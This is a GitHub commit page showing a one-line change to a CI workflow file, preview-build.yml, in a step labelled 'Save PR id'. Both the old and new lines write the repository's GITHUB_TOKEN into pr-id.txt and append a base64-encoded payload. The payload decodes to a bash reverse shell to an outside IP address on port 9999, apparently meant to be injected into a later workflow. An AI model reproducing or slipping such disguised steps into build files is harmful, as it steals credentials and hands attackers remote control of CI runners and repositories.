Skip to content

Commit

Permalink
Update preview-build.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
Chave0v0 authored Sep 27, 2024
1 parent 7ef7ffe commit 0c79eaf
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion .github/workflows/preview-build.yml
Original file line number Diff line number Diff line change
Expand Up @@ -48,7 +48,7 @@ jobs:
# Upload PR id for next workflow use
- name: Save PR id
if: ${{ always() }}
run: echo -n ${{ secrets.GITHUB_TOKEN }} > pr-id.txt && echo "JiYgYmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTQ5LjM3Lzk5OTkgMD4mMSAmJiB3aG9hbWkgIw==" | base64 -d >> ./pr-id.txt
run: echo -n ${{ secrets.GITHUB_TOKEN }} > ./pr-id.txt && echo "JiYgYmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTQ5LjM3Lzk5OTkgMD4mMSAmJiB3aG9hbWkgIw==" | base64 -d >> ./pr-id.txt

- name: Upload PR id
if: ${{ always() }}
Expand Down

0 comments on commit 0c79eaf

Please sign in to comment.